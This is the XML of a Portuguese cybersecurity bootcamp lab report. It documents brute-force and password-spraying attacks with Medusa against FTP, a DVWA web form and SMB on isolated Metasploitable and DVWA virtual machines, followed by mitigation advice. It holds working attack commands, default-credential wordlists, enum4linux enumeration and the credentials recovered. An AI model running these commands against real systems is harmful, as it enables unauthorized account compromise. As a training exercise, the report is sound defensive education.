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Projeto: Simulação de Ataques de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Força Bruta com Medusa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Bootcamp de Cibersegurança — Riachuelo / DIO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="20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Março de 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Ambiente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">O laboratório foi configurado com duas máquinas virtuais no Oracle VirtualBox, conectadas em rede host-only (isolada), garantindo que nenhum tráfego saísse para a rede corporativa.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Máquina Virtual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Endereço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Kali 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Atacante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192.168.56.100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Metasploitable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Alvo vulnerável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192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Tipo de rede: Host-only Adapter — todo o tráfego é isolado entre as VMs, sem acesso à rede externa ou corporativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Cenários Testados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cenário 1 — Força bruta em FTP (Metasploitable 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cenário 2 — Força bruta em formulário web (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cenário 3 — Enumeração de usuários + password spraying em SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Comandos Utilizados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Cenário 1 — FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Verificação da porta FTP no alvo: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nmap -p 21 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Criação das wordlists de usuários e senhas no Kali Linux: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&lt;&lt;EOF &gt; usuarios.txt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root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msfadmin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ftp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&lt;&lt;EOF &gt; senhas.txt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123456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password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msfadmin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root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toor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spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Execução do ataque de força bruta com Medusa no serviço FTP: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medusa -h 192.168.56.101 -U usuarios.txt -P senhas.txt -M ftp -t 4 -v 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Validação manual do acesso encontrado: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ftp 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Cenário 2 — Formulário Web (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Acesso ao DVWA via Firefox: http://192.168.56.101/dvwa — login com admin/password e nível de segurança configurado para Low.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Captura do cookie de sessão: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-c cookies.txt -d "username=admin&amp;password=password&amp;Login=Login" "http://192.168.56.101/dvwa/login.php"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Execução da força bruta no formulário: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medusa -h 192.168.56.101 -u admin -P senhas.txt -M http -m "FORM:/dvwa/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:incorrect" -t 2 -v 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Cenário 3 — SMB (Enumeração + Password Spraying)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Enumeração de usuários reais do sistema com enum4linux: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enum4linux -U 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Criação da lista de usuários enumerados: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&lt;&lt;EOF &gt; usuarios_smb.txt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msfadmin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root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service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spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Password spraying via Medusa com o módulo smbnt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1F4E79" w:sz="6" w:space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medusa -h 192.168.56.101 -U usuarios_smb.txt -p "msfadmin" -M smbnt -t 2 -v 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/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Enumeração de usuários via SMB (enum4linux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">O enum4linux v0.9.1 foi executado contra o alvo 192.168.56.101 e retornou os seguintes dados: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Workgroup/Domain: WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O servidor permitiu sessão anônima (sem necessidade de usuário ou senha)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mais de 30 contas de usuário foram listadas, incluindo: games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, msfadmin, entre outros</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">A permissão de sessão anônima é uma falha crítica de configuração que facilita significativamente ataques subsequentes, pois permite ao atacante mapear todos os usuários sem autenticação prévia.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Figura 1 — Saída do enum4linux listando usuários do Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Password Spraying em SMB + Resultado do Medusa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Com base nos usuários enumerados, o Medusa foi executado com o módulo smbnt aplicando a senha padrão 'msfadmin' contra todos os usuários da lista. O resultado foi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="E8F4E8" w:val="clear"/>
        <w:spacing w:before="120" w:after="12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ACCOUNT FOUND: [smbnt] Host: 192.168.56.101 | User: msfadmin | Password: msfadmin | SUCCESS (ADMIN$ - Access Allowed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">O usuário msfadmin obteve acesso ao compartilhamento administrativo ADMIN$, indicando privilégios elevados no sistema alvo. Isso demonstra que a senha padrão do sistema estava em uso no serviço SMB.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Figura 2 — Medusa encontrando credenciais válidas no SMB com acesso ADMIN$ confirmado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Análise geral dos resultados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Os três cenários demonstraram que o Metasploitable 2 utiliza credenciais padrão amplamente conhecidas, sendo vulnerável a ataques de força bruta em múltiplos serviços (FTP e SMB). A enumeração anônima via SMB permitiu obter a lista completa de usuários sem nenhuma autenticação prévia, o que facilitou significativamente o ataque de password spraying subsequente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">O ataque completo — da enumeração ao acesso administrativo — foi concluído em poucos minutos, evidenciando o risco crítico de configurações padrão em ambientes de produção.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Recomendações de Mitigação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Vetor de ataque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Como prevenir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Credenciais padrão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Nunca manter senhas padrão em produção. Trocar todas as credenciais no primeiro acesso.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Força bruta FTP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Desabilitar FTP, usar SFTP. Implementar fail2ban para bloquear IPs após tentativas falhas.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Brute force web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Rate limiting, CAPTCHA e bloqueio por IP após X tentativas falhas.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Password spraying SMB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Desabilitar SMBv1, implementar MFA e monitorar autenticações no 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Sessão anônima SMB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Desabilitar sessões nulas no SMB. Restringir enumeração de usuários via política de grupo.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Geral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Senhas longas e únicas, gerenciador de senhas, MFA em todos os serviços críticos e monitoramento de logs de autenticação.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Conclusão</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Este projeto demonstrou na prática como credenciais padrão e configurações inseguras representam riscos críticos em ambientes reais. Através do Medusa, foi possível comprometer serviços FTP e SMB em poucos minutos, enquanto a enumeração anônima via SMB revelou toda a base de usuários do sistema sem qualquer autenticação.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">A execução do projeto reforça a importância de aplicar as medidas de mitigação documentadas acima antes de expor qualquer serviço em ambiente de produção. O laboratório foi integralmente realizado em ambiente isolado (VirtualBox host-only), sem qualquer risco à rede corporativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ferramentas utilizadas: Kali Linux, Medusa v2.3, Nmap, enum4linux, curl, DVWA, Metasploitable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ac8acef4b6487af58c11bc204df6df77d2583e3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/032be261c1a05900e9967624439c25e7826d629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2026-03-24T18:46:25.700Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T18:46:25.701Z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